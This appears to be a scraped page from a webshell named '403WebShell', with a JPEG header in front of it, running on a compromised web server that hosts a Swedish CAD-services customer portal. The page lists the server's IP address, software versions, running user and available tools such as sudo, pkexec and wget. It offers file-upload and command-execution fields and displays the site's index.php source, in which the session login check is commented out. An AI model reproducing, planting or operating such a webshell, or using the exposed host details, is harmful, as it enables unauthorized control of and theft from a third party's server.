????JFIF??x?x????'403WebShell
403Webshell
Server IP : 79.136.114.73  /  Your IP : 18.188.119.49
Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f
System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/icad.astacus.se/customerzon/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/icad.astacus.se/customerzon/index.php
<?php 
session_start();
	
	
	
	//if( ($_SESSION['ASTACUS_SSO_INFO']=='' )){
		
	//		header('location: http://icad.astacus.se/?page=loggain&message='.$status);
	//}
	
	include("language.php");


?>

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>iCAD - CAD services via Internet</title>

<script type="text/javascript" src="http://download.skype.com/share/skypebuttons/js/skypeCheck.js"></script>
         <script type="text/javascript">
/* showClock() function extracts the current time hours, minutes and seconds and then displays them in the div with showText id from the BODY section */

function showClockSWE()
{
var clock=new Date( );
var hours=clock.getHours();
var minutes=clock.getMinutes();
var hours2=(clock.getHours() + 4) % 24;
var minutes2=(clock.getMinutes() + 30) % 60;
var seconds=clock.getSeconds();
// for a nice disply we'll add a zero before the numbers between 0 and 9
if (hours<10){
hours="0" + hours;
}
if (minutes<10){
minutes="0" + minutes;
}
if (seconds<10){
seconds="0" + seconds;
}

if (hours2<10){
hours2="0" + hours2;
}
if (minutes2<10){
minutes2="0" + minutes2;
}

document.getElementById('showTextSWE').innerHTML=hours+":"+minutes+":"+seconds;
document.getElementById('showTextIND').innerHTML=hours2+":"+minutes2+":"+seconds;
t=setTimeout('showClockSWE()',500);
/* setTimeout() JavaScript method is used to call showClock() every 1000 milliseconds (that means exactly 1 second) */
}



</script>          
<link href="../main.css" rel="stylesheet" type="text/css">
</head>

<body marginheight="0" topmargin="0" marginwidth="0" leftmargin="0" rightmargin="0">
<table width="100%"  border="0" cellpadding="0" cellspacing="0">
  <tr>
    <td height="112" valign="top" background="../images/bottom_small.jpg"><table width="820" height="65" border="0" align="center" cellpadding="0" cellspacing="0">
      <tr>
        <td height="65"> <table width="820" border="0">
          <tr>
            <td width="607" align="left"><div align="left"></div>
                <table width="607" border="0" align="left" cellpadding="0" cellspacing="0">
                  <tr>
                    <td width="140"><img src="../images/icadloggo.gif" width="94" height="39"></td>
                    <td width="680"><table width="454" border="0" align="center" cellpadding="0" cellspacing="0">
                        <tr>
                          <td width="342" class="whitelink"><a href="../?page=loggain" class="whitelink"><?php echo($a101);?>, <?php echo($_SESSION['ASTACUS_SSO_INFO'][1]. " (".$_SESSION['ASTACUS_SSO_INFO'][2]);?>)</a></td>
                          <td width="19"><a href="../?page=icad" class="whitelink"> </a></td>
                          <td width="38">&nbsp;</td>
                          <td width="9">&nbsp;</td>
                          <td width="115">&nbsp;</td>
                          <td width="140"><div align="right"><a href="../?page=loggaut" class="whitelink"><?php echo($a102);?></a></div></td>
                          <td width="4"><span class="text"></span></td>
                          <td width="13"><span class="text"></span></td>
                        </tr>
                    </table></td>
                  </tr>
              </table></td>
            <td width="49" align="left"><a href="?page=support"><img src="../images/support.png" width="30" height="30" border="0"></a></td>
            <td width="150" class="whitelink"><a href="?page=support" class="whitelink"><?php echo($a103);?> </a></td>
          </tr>
        </table></td>
        </tr>
    </table></td>
  </tr>
</table>
<?php
$page = $_GET['page']; 
if($page == "project"){
	include("project.php");
}else if($page == "logg"){
	include("logg.php");
}else if($page == "upload"){
	include("upload.php");
}else if($page == "download"){
	include("downloadfiles.php");
}else if($page == "settings"){
	include("installningar.php");
}else if($page == "shared"){
	include("shared.php");
}else if($page == "files"){
	include("files.php");
}else if($page == "sharedupload"){
	include("sharedupload.php");
}else if($page == "filesshared"){
	include("sharedfiles.php");
}else if($page == "shareddownload"){
	include("shareddownload.php");
}else if($page == "support"){
	include("support.php");
}else if($page == "report"){
	include("report.php");
}else if($page == "customer"){
	include("customer.php");
}else if($page == "start2"){
	include("start2.php");
}else if($page == "usersettings"){
	include("usersettings.php");
}else{



if($_SESSION['ASTACUS_SSO_INFO'][3] == 2 || $_SESSION['ASTACUS_SSO_INFO'][3] == 7 || $_SESSION['ASTACUS_SSO_INFO'][3] == 5 || $_SESSION['ASTACUS_SSO_INFO'][3] == 8 || $_SESSION['ASTACUS_SSO_INFO'][3] == 10 || $_SESSION['ASTACUS_SSO_INFO'][3] == 12){
	include("start_admin.php");
}else{
	include("start.php");
	
	}
	
}

mysql_close($link);
?>


<p>&nbsp;</p>
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit